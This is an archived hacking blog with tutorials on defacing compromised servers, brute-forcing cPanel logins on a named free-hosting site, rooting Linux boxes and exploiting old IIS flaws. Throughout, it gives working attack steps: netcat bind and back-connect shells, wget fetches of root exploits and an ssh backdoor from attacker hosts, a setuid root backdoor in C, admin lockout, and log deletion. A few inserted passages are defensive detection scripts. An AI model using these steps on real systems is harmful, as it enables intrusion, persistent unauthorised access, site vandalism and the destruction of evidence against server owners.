Showing posts with label Webserver. Show all posts

Saturday, July 7, 2012

How to deface a "r00ted" server


**********STEP 1**********
First, get an idea of what you want the deface to say and what language you're most likely going to use.
*** Common languages for a deface are ***
1. HTML
2. CSS
3. XML
4. PHP (not too sure about this one)
5. CS5 using Adobe (if you wanna get fancy)
The choices may vary...
For this tutorial we're going to use HTML because it's more common.
Whatever language you happen to choose (I recommend HTML), make sure you brush up on it and are very familiar with it, so you're able to make a decent-looking file to host on the "rooted" server.



**********STEP 2**********
The next thing to do is look at the server database of the location where you are going to be hosting the .html deface file, to see what the server will and will not take from .html files. THIS IS VERY IMPORTANT: you must check with the server and test out the files before you try to host or make your deface HTML file (some servers I come across will only host XML or CSS). Make sure you know what type of language it will host and what it will not host.
A lot of the time servers can be very expandable, so they will take mostly anything you throw at them, but just to be sure, please check.

**********STEP 3**********
Well, once you have done all your checking, looked at the server, and have a basic idea of what you'll be doing, we can start building your deface file.

***Tools you will need***
1. Notepad++ (I recommend this version of notepad)
2. A guide to HTML or the language you'll be using, unless you're a TOTAL NINJA at the language, in which case skip this tool
3. (This one you'll need; it will cut the work almost in half) phpMyAdmin - this tool will let you test your .html etc. and it won't take you a sec to download. Here's the link: http://www.phpmyadmin.net/home_page/index.php
- OK, once you have all the tools listed here (guide is optional) you can start building the .html file using the tools I just listed. It should be a snap if done right.
- OK, listen up here!! At this point you might think I'm also going to show you how to write HTML too, huh? Well, sorry to say it, but showing you how to write HTML and explaining how to do this would take WAY too long, and if you're here on a defacing tutorial and you don't know how to write HTML then you should really be in an HTML tutorial. My HTML tutorial is coming soon!!!
- OK, so once your HTML file is made you can save it as a .html file. You can name it whatever you want; it doesn't matter and won't affect the process at all. Once you have tested it out on phpMyAdmin and are happy with the results, you can start the defacing!


**********STEP 4**********
- OK, the next step you want to take is opening your "rooted" server.
BUT you always want to be VERY sure you have a good proxy server running and that you always have multiple s0cks for your HTTP browser when you are entering a "r00ted" server, and never EVER EVER!!! set the server config settings to your own settings (most servers have auto config for the admin account). This logs the last login from the admin and adds the IP and port number it came from, and if you don't have a pr0xy and good s0cks then you must be VERY careful of the IP and port you use, and NEVER set the config up yourself; you'll screw up the IP settings on the server.

**********STEP 5**********
- OK, once you are in the admin accounts and the server settings, look for an .html file (or similar) and copy all of the code you see. Then open your regular notepad and paste all the code inside the notepad doc. After the code is all in there, save the doc as a .html file; name it whatever. Then open it and see if the file looks like the site on the server you "r00ted". If so, go back to the server and erase all of the code that you copied. After you have done that, refresh the server settings and type in the URL of the site that you "r00ted". If nothing shows up but the page is done loading, then that means you have just taken the HTML visuals out and the site is faceless!!!

**********STEP 6**********
- OK, once the site is faceless, go back to the server settings, add your file, and make sure that the server is running the defacing file. So about this point you think you're done, huh? Well, wrong, you're not. You need to make a path for the file and for the user to be redirected to. If this step is not done, all the user will see is the blank page. Another reason why you need a path is that if the admin of the server ever gets back the admin account, it will be harder for them to find the file where the defacing is coming from, thus making it harder for them to take it down.

**********STEP 7**********
- OK, in order to make a good path for the file you must find an empty path name on the server that is not being used by another file hosted by the server. When I look for one I try to find the dorks for them on Google.com,
but you can just guess most of the time and land on an empty one. Most small sites have all the common ones and not the FTP paths and the .asp paths, but it's all up to you!
Once you have your file hosted and your path is found, all you have to do is replace the URL of the site and the redirect URL of the site with your HTML file and your path.
EXAMPLE: http://www.example.com/(your file path here).html
Then replace the regular URL with yours and try it out!!!!
If all came out well and the deface page looks good then your mission is completed!!!
You have just defaced a website!!
If Google doesn't pick up on it then give it a day or two and try again; I'm sure it will work!! Then the final step is to brag to all your friends about your hacked site.
Thank you for reading...


Full Rooting Explanation



Rooting is gaining a high uid on a server which gains statics to control the entire server.
Most people think they are actually completing their step in rooting when they are not,
all people do is mixed in this order:

1. Back Connect OR use the prompt in the shell itself and type in uname -a

2. Get the version for the box, it may be familiar to 2.6.18

3. Go on securityfocus or 1337day.com and search for it.

4. Get a connection via back-connect, then they simply wget a Local Root Exploit.

Or simply go to the PHP shell itself and go to a dir and upload a .C file which pertains a Local Root Exploit.

5- Get the ID it was labeled, it will be featured in the wget results,
or if you did it via shell, you will know the name it was given because you uploaded it.

6. Then simply gcc -o ExploitName or gcc -o LocalRootExploitName.c

But today I will be showing you how to do this and actually understand what you are doing.
You will use 1337day, and while you're doing this you will upgrade your knowledge.

First, get your PHP shell, you can upload it through FTP using mput
(mput is a command used to add something on a server included from your system, example: mput C:\users\X-pOSed\shell.php)
Or you can do it if you find an upload.php dir on the system,
of course upload.php can feature uploading php,
or it can feature an only accessory for .jpg/.png/etc. Well,
this can easily be bypassed through a Null Byte Upload, to do this,
all you need to do is compile your php script into a .jpg function.

You can do this by following these steps:

1. Open Notepad

2. Add your php script

3. File >> Save as >> shellname.php.jpg (you have to leave it is a URL-Encoded Byte)

4. Upload on the server.

Null Byte is used to terminate anything after it.

But this can be patched on some web servers, so DO NOT expect it to work 100%.

But if /upload.php features an accessible function for the extension .php
Then upload your normal PHP Shell. And then you need to find the directory,
you can usually get this by doing the following:

1. Your victimized site has to have Anonymous User enabled.

2. Open Command Prompt

3. Type in ftp http://www.victim.com

4. Enter wrong details when it asks for user and password

5. After that is finished type in: quote user ftp (It quotes the user under the name FTP) then type in: quote cwd ~root (Pertains the cwd of root) then type in: quote pass ftp

Now you have the ability to view dirs, cd to directories, etc.

Try finding incoming, and if you do, try finding your shell.

If you cannot find anything, there are other things you can do.

You can use acunetix web scanner to find directories.

After you got your shell up and ready, play around a bit,
and try finding mysql details (in config.php, irc details in ircd.conf, etc, etc) If you find it there is probably an mysql option in your shell, use it.
You can also try logging in with those details in SSH, which can get you root easily. To try this out, you cannot just telnet to port 22, because port 22 (ssh) has its own client/server.

Download PuTTY.

Insert the site you want to connect to, and be sure the label is selected on SSH.

Once you do that, press Open.

Now try the details you got in config.php

If it doesn't work, you're out of luck on that probability.

But, we do not stop there.

Go to “Back Connection” your IP is in the text box and in the sec text box is your port,
the port you want to back-connect to needs to be forwarded. This can be easily done if you locate your HTTP config for your router.
You can find this in command prompt by typing in ipconfig and in linux all you need to do is type in ifconfig.

Now go to the main router page (192.168.0.1 as an example), then search around for Port Forwarding. Your router page may require a password;
if it's changed, just simply restart your router, and if it still does not work, search on Google.

After your port is forwarded (port forward example: 1337), insert it into the second text box. But wait up, you're not done. You will need to install netcat;
in Linux simply:

sudo apt-get install netcat

And in Windows, go to this link:

Click Here

You might need to uninstall winrar, well, put nc111nt.zip in a directory, on your desktop, documents, anywhere. I recommend putting it on the desktop time-being.

Then open Command Prompt, then type in cd C:\users\NAME\desktop\nc111nt or cd C:\users\NAME\desktop\nc111nt.zip

Now when you're in there, type:

nc

If anything comes back, it's working.

Now type in:

nc -l -n -v -p PORT

PORT needs to be replaced with the port you forwarded.

Press enter, then go to your shell and press the magic button ( On the back-connection page where you inserted your IP along with the forwarded port).

Now you should be in your back-connect session. Type in:

uname -a

This will show us its current Linux Version, SMTP Version, PHP version, etc, for example:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Mon Jar 30 08:14:05 EDT 2011 i686

Now you go to 1337day.com, as you can see .

There are various more all you need to do is go 1337day and search for 2.6.17

That there is a C script that can be used for gaining root on the server.
Well, we can do this two ways, lets discuss the first:

1. Open Notepad

2. Put in the C script

3. File >> Save as >> LocalRootExploit.C

4. Upload it on the shell

5. Open your netcat session

6. Type in gcc root -o LocalRootExploit.c (gcc is a command in ssh used for compiling a certain directory,
this tells it to make a root dir, and open it as what we earlier uploaded via our shell, which in this case is LocalRootExploit.c)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission, and if in ID, it comes with something like: uid=(0)root you’ve completed your mission as well.

Or we can do this via netcat:

1. Go to your netcat session

2. Type in wget http://milw0rm.com/exploits/5092 (wget is used to download a file from a particular server, in this case: milw0rm)

4. Now considering 5092 was the last bit in our URL, that is what we will need to compile it as

5. Type in gcc root -o 5092 (gcc is a command in ssh used for compiling a certain directory,
this tells it to make a root dir, and open it as what we earlier wget’d, which in this case is 5092)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission, and if in ID,
it comes with something like: uid=(0)root you’ve completed your mission as well.

Now you can add an sshdoor via:

wget http://www.familysksd.phpnet.us/sshdoor

You can use plenty of commands and even sudo apt-get install some accessories you can also use the Edit command or Emacs command to add a password logger (php based) on login.php.


Learn How To Hack Web Servers


Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port it's listening on,
www.yourserver.com is some web server with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions.
A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request.

Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site, an attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, ncx.exe is configured to run from the root directory.
IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe
The attacker can then use netcat to evoke the command shell
c:\>nc  80
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

Install the latest service pack from Microsoft.
Remove IPP printing from the IIS server.
Install a firewall and remove unused extensions.
Implement aggressive network egress filtering.
Use the IISLockdown and URLScan utilities.
Regularly scan your network for vulnerable servers.

The first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types.
This particular ISAPI filter resides in C:\WINNT\System32\msw3prt.dll and provides Windows 2000 with support for IPP. If this functionality is not required on the web server, the application mapping for this DLL to .printer files can be removed (and the DLL itself optionally deleted) to prevent the buffer overflow from being exploited.
This works because the DLL will then not be loaded into the IIS process when it starts up.
In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasures to adopt when securing IIS.
Another standard countermeasure is to use a firewall and remove any extensions that are not required.
Implementing aggressive network egress filtering can help to a certain degree.
With IIS, using IISLockdown and URLScan (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities yet to be found in the code.


ISAPI DLL Source disclosures

Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible.
This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc.) file.
Appending this string causes the request to be handled by ISM.DLL, which then strips the "+.htr" string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. A vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions.
HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superseded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods


Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file followed by around 230 "%20" sequences (these represent spaces) and then ".htr", the client tricks IIS into thinking that it is requesting a ".htr" file. The .htr file extension is mapped to the ISM.DLL ISAPI application, and IIS redirects all requests for .htr resources to this DLL.

ISM.DLL is then passed the name of the file to open and execute, but before doing this ISM.DLL truncates the buffer sent to it, chopping off the .htr and a few spaces, and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service is started and stopped. It will only work when ISM.DLL is first loaded into memory.

"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.

If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.

".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the .HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.

The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.

"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.
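
The request shapes described in this section ("+.htr" after a script name, a long run of encoded spaces before ".htr", an oversized URL ending in ".htr", and hits on the .printer mapping) can be looked for in IIS logs. The following is an added example, not part of the original post: the log lines are constructed, and the W3C field layout, the thresholds and the finding names are assumptions.

```python
from urllib.parse import unquote

SCRIPT_EXTS = (".asp", ".asa", ".ini")  # file types the text says can leak
PAD_THRESHOLD = 20   # assumption: run of spaces before .htr worth alerting on
LONG_STEM = 512      # assumption: .htr requests longer than this are suspect

# Constructed sample in W3C extended log format (not real traffic).
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-05-01 10:00:01 192.0.2.10 GET /default.asp - 200",
    "2001-05-01 10:00:05 192.0.2.44 GET /global.asa+.htr - 200",
    "2001-05-01 10:00:09 192.0.2.44 GET /login.asp" + "+" * 230 + ".htr - 200",
    "2001-05-01 10:00:12 198.51.100.7 GET /" + "A" * 3000 + ".htr - 500",
    "2001-05-01 10:00:20 192.0.2.10 GET /pw/change.htr - 200",
    "2001-05-01 10:00:31 203.0.113.9 GET /null.printer - 500",
])


def classify(stem):
    """Return a finding name for one cs-uri-stem value, or None."""
    # Assumption: spaces reach the log as '+'; raw '%20' is accepted as well.
    s = unquote(stem.replace("+", " ")).lower()
    if s.endswith(".printer"):
        return "printer_mapping_hit"      # msw3prt.dll mapping is reachable
    if not s.endswith(".htr"):
        return None
    base = s[:-len(".htr")]
    target = base.rstrip(" ")             # file name once padding is removed
    pad = len(base) - len(target)
    if pad >= 1 and target.endswith(SCRIPT_EXTS):
        if pad >= PAD_THRESHOLD:
            return "htr_padded_source_request"
        return "htr_source_request"
    if len(s) > LONG_STEM:
        return "htr_oversized_request"
    return "htr_request"                  # ISM.DLL mapping is in use


def scan(log_text):
    """Parse a W3C log, honouring its #Fields line; return findings."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        stem = row.get("cs-uri-stem", "")
        kind = classify(stem)
        if kind:
            findings.append((row.get("c-ip"), kind, len(stem)))
    return findings


if __name__ == "__main__":
    for ip, kind, length in scan(SAMPLE_LOG):
        print(f"{ip:15} {kind:28} stem_len={length}")
```

Plain `htr_request` and `printer_mapping_hit` findings show whether the mappings are still reachable at all, which is the input needed for the "remove unused extensions" countermeasure above.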


Monday, June 4, 2012

CPanel Cracking

Today I want to show you my new cPanel cracking tutorial. I found this way by myself (I mean the dork, not everything).

What you need:
-Cpanel brute forcing program (I recommend Acunetix or the Cpanel perl script)
-A brain (I recommend a good one, you'll need it for username)
-Browser
-And maybe FTP-Client (Decide what you want)
-Wordlist for passwords

What I used:
-Cpanel brute forcing program: Acunetix
-Brain: The best
-Browser: Firefox
-Ftp-client: The default windows ftp-client
-Wordlist for passwords: I use a 26GB passlist

Dork for finding hackable sites:
site:heliohost.org
or
site:afreehosterwithcpanelsupport.com/.in/.net/...

I used http://indianew.heliohost.org

Username:
Mostly subdomain (In my case indianew)

Port:
Mostly 2082
or
/cpanel

Password:
We'll brute force that
But you need a passlist for that

In my video I'll use a shortened passlist, because I already know the password.
------------------------

Video:
http://www.multiupload.com/NORUKXMZ89

------------------------

Ok start with Tutorial:

1. Find hackable site and open the cpanel login (e.g. http://example.example.org:2082)

2. When you open the site, a Pop-up has to open, if not search for another site

3. Open Acunetix, navigate to "Authentication Tester"

4. At target URL to test: http://example.example.org:2082

5. Now create a new txt file anywhere with the username in it (You can brute force that too, but you won't find something)

6. In Acunetix, choose the file you made at step 5 for "Username dictionary path"

7. For "Password dictionary path" use the Acunetix default list, or your own passlist

8. Now click on start

9. This may take a while

10. If you find something, GREAT. If not, search for another site, or use another username, or use another passlist

11. If you find something go to the cpanel site in your browser (e.g. http://example.example.org:2082 or http://example.org/cpanel)

12. Log in with the username and password you found at step 10

13. BAAAAAAAM You're in. Now you can do anything you want with the site, but I'll now explain some steps you should do

14. Change the password of cpanel and also of ftp so that the target admin isn't able to log in anymore and delete your deface. (After changing the password, you may have to re-login with the new password)

15. Upload your defacement with the "File-Manager" or use FTP for that. I'll use FTP, because I love it. If you want to use FTP continue reading; if you want to upload the file with the file manager, continue by yourself

16. Open "FTP-Accounts"

17. Change the password of every FTP-Account!!!

18. Scroll down to Special FTP-Accounts and click on "Configure FTP-Client" of /home/username goes here

19. You'll get the information of ftp username and ftp-server and port and SFTP port

20. Password is the same, which you set at 14

21. Now open an FTP client and log in with this information. I'll use the Windows default; if you want to use that too continue reading, if you use your own FTP client use your own

22. Open CMD

23. Type "ftp"

24. Then "open here server, which you found at step 19"

25. Then you have to type the username, which you found at step 19

26. The password, which you set at step 14

27. Type "cd /public_html" or wherever the index site is

28. Type "del index.html" or whatever file you want to delete (e.g. index.php, index.html,...)

27. Type "send C:\where your deface page is", in my case "send C:\index.html"

28. The site is defaced

29. Now you should delete the log files!!!REALLY IMPORTANT!!! (I forget that in the video)

30. For that go back to cpanel FTP Accounts and there should be username_logs, in my case indianew_logs

31. Navigate to Configure FTP-Client

32. Log in with that information

33. Delete all LOGS, now disconnect from the server and you're finished

---------------------------

I hope you understood. A video tut is also coming.
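
Seen from the hosting side, the procedure above leaves a burst of failed logins on the cPanel port from one address, followed by a success. The following is an added detection example, not part of the original post: the log lines are constructed, and the common-log-style line format, the thresholds and the alert names are assumptions.

```python
import re
from datetime import datetime, timedelta

# Assumption: access log lines in common log format (ip, ident, user,
# [timestamp], "request", status, bytes).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>[^"]*)" (?P<status>\d{3}) ')

FAIL_THRESHOLD = 5               # assumption: failures that make a burst
WINDOW = timedelta(minutes=10)   # assumption: sliding window for a burst

# Constructed sample: a dictionary run that ends in a success, one ordinary
# mistyped password, and a run that never succeeds.
SAMPLE = [
    f'203.0.113.50 - siteuser [04/Jun/2012:09:00:{s:02d} +0000] '
    '"GET / HTTP/1.1" 401 0'
    for s in range(0, 40, 2)
] + [
    '203.0.113.50 - siteuser [04/Jun/2012:09:00:41 +0000] '
    '"GET / HTTP/1.1" 200 5120',
    '198.51.100.20 - owner [04/Jun/2012:09:05:00 +0000] '
    '"GET / HTTP/1.1" 401 0',
    '198.51.100.20 - owner [04/Jun/2012:09:05:09 +0000] '
    '"GET / HTTP/1.1" 200 5120',
] + [
    f'192.0.2.77 - admin [04/Jun/2012:09:10:{s:02d} +0000] '
    '"GET / HTTP/1.1" 401 0'
    for s in range(6)
]


def detect(lines, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return (ip, alert, failures_in_window) tuples in log order."""
    recent = {}   # ip -> timestamps of 401 responses still inside the window
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, status = m["ip"], m["status"]
        fails = [t for t in recent.get(ip, []) if ts - t <= window]
        if status == "401":
            fails.append(ts)
            recent[ip] = fails
            if len(fails) == threshold:      # alert once per burst
                alerts.append((ip, "failed_login_burst", len(fails)))
        elif status.startswith("2"):
            if len(fails) >= threshold:      # success right after a burst
                alerts.append((ip, "login_after_burst", len(fails)))
            recent[ip] = []
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Because the post ends with the account's log files being deleted, a check like this is only reliable on log copies that are forwarded off the host as they are written.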


Saturday, June 2, 2012

How to Root

Required for this tutorial:

Code:
Access to a shell - Upload by any-means a shell onto a box
mig-log cleaner - http://b14ck1c3.freehostia.com/miglc
Netcat - http://www.vulnwatch.org/netcat/nc111nt.zip
Netcat(unix) - http://b14ck1c3.freehostia.com/nc
Local RootExploit - http://jshooter.by.ru/xpl/
half a brain
willingness to learn

Now that you have all that in order lets begin.

Go to the path of or access your shell by whatever means necessary.
Make sure that your shell is in a writable folder just to make things
easy for us. In our case today for this tutorial we will be using
storm7shell, not exactly my favorite but it will get the job done nonetheless.
An example of this location would be something like:

Code:
http://target/youshell.php
Now that we are on your shells page we want to find out what os this box is
running and what version the kernel is. In our case it’s linux 2.6.8. So we
will want to find a local root exploit for this kernel version of the linux os.
What we want to do now that we have our local root exploit for our kernel
is spawn a shell so that we can talk to the victim's box and run our commands
without interruption. But how are we supposed to do that? This can be done by
using a tool called Netcat. So now that we have a copy of Netcat we will go to
the shell, find the command execution area of the shell and enter:

Code:
wget http://b14ck1c3.freehostia.com/nc
What this will do is download the file of Netcat i have pre-compiled and hosted
for you onto the victim box to the location of your shell. Once we have the download
complete we will want to chmod it so that our user has access to run it. which can
be done by entering:

Code:
chmod +x nc
What this does is grants everyone (user, group and other) execute permission, and the
command to the file nc which we had just previously downloaded onto the box with the
wget command.

Now that we have nc installed on both the victim machine and your own it’s time to make
our connection. How Do we make a connection with nc? In the command execution area of your
shell enter:

Code:
./nc -l -p 8080 -e /bin/sh
(shell can be /bin/sh or cmd.exe for example)

And then on the netcat installed on your pc you will want to enter:
nc VictimIP Port *in our case 8080*

Code:
eg 123.123.123.123 8080
What this will do is cause the netcat on the victims box to listen on port 8080 and shovel
back an interactive shell for you once you make the connection from which you typed:

Code:
nc victimip port
Now that We have our interactive shell spawned we can start to prepare the box for rooting.
First we will want to get our local root exploit onto the box and get it compiled if it’s
not already. This can be done by once again using that nifty wget command we learned about
in the previous steps.

Code:
wget http://yoursite/xpl
What we have done is now downloaded your exploit. If your exploit is not already compiled you
will need to compile it in order to run it. Compiling your exploit can be done by using the gcc,
like so:

Code:
gcc xpl.c -o xpl;chmod +x xpl
This will compile your xpl.c and output it into a file called xpl, which will be the compiled copy
of your exploit, and then chmod xpl. Now you are ready to run your exploit and get your root on.
Exploits vary in their usage, so make sure you have an understanding of the root exploit
you are using. You can run your xpl file by entering:

Code:
./xpl
Wait until your exploit is finished running once it is done enter:

Code:
whoami
What the whoami command does is tell you who you are. If this tells you root then your xpl has done
its job and you now have root privs on the box. Or you can type:

Code:
id
which will give you something like:

Code:
uid=0(root) gid=0(root) groups=500(apache) or something similar
And now you can do your happy dance.

Now that we have rooted the box and finished humiliating ourselves by dancing around, we want to make
sure that we can come and go as we please without all the hassle of rooting the box over and over. So
we will want to create some kind of backdoor.
We can make this happen with a few lines of code:

Code:
#include  #include  #include  #include   int main( void ) {      setuid( 0 );      system( "/bin/bash" );       return 0; }
Compile it and change permissions:

Code:
root@foobar /root# gcc -o .bkdr main.c root@foobar /root# chown root:root .bkdr root@foobar /root# chmod +s .bkdr
Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferably
in the $PATH) and if you execute it as another user:
raif@foobar /home/raif$ /usr/local/bin/.bkdr
root@foobar /home/raif# whoami

root

Now you have your access back.
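
A file like the one just described (owned by root, setuid bit set, dot-prefixed name, sitting in a directory on the $PATH) is what a setuid audit is meant to surface. The following is an added example for that audit, not part of the original post: the records are constructed, and the baseline list, the directory prefixes and the reason strings are assumptions to adapt per system.

```python
import os
import stat

# Assumption: a site-specific allowlist of setuid-root binaries you expect.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}
# Assumption: places where a distribution does not normally ship setuid files.
UNUSUAL_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/usr/local/")

# Constructed (path, st_mode, st_uid) records. The second mirrors the
# /usr/local/bin/.bkdr file above after "chown root:root" and "chmod +s".
SAMPLE_RECORDS = [
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),
    ("/usr/local/bin/.bkdr", stat.S_IFREG | 0o6755, 0),
    ("/usr/local/bin/backup.sh", stat.S_IFREG | 0o0755, 0),
    ("/home/raif/game", stat.S_IFREG | 0o4755, 1000),
    ("/opt/vendor/agent", stat.S_IFREG | 0o4755, 0),
]


def assess(path, mode, uid, baseline=BASELINE):
    """Return the reasons a file looks like a planted setuid-root helper."""
    if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID) or uid != 0:
        return []
    if path in baseline:
        return []   # expected by path; pair with package verification
    reasons = ["setuid root, not in baseline"]
    if os.path.basename(path).startswith("."):
        reasons.append("hidden file name")
    if path.startswith(UNUSUAL_PREFIXES):
        reasons.append("unusual directory")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("writable by group or others")
    return reasons


def triage(records, baseline=BASELINE):
    """Assess records and return hits, most reasons first."""
    hits = [(p, assess(p, m, u, baseline)) for p, m, u in records]
    hits = [(p, r) for p, r in hits if r]
    return sorted(hits, key=lambda h: -len(h[1]))


def audit(root, baseline=BASELINE):
    """Walk a directory tree without following symlinks and triage it."""
    records = []
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue   # file vanished or is unreadable
            records.append((path, st.st_mode, st.st_uid))
    return triage(records, baseline)


if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_RECORDS):
        print(path, "->", "; ".join(reasons))
```

Mounting writable areas such as /tmp and /home with `nosuid` removes the effect of the setuid bit there, so the audit then mainly has to watch system directories.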

Alright, we have almost completed our mission. We have successfully rooted our victim's box and created our
backdoor; now all we need to do is wipe the tracks that we left in the logs and be on our way. This
can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner, which you
can get here:

Code:
http://b14ck1c3.freehostia.com/miglc
Once again we can use our wget command to upload our logcleaner to the rooted box.

Code:
wget http://b14ck1c3.freehostia.com/miglc;chmod +x miglc
now just run the logcleaner

Code:
./miglc
The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner
so you may choose how exactly you want to clean the logs with the commands given to you.
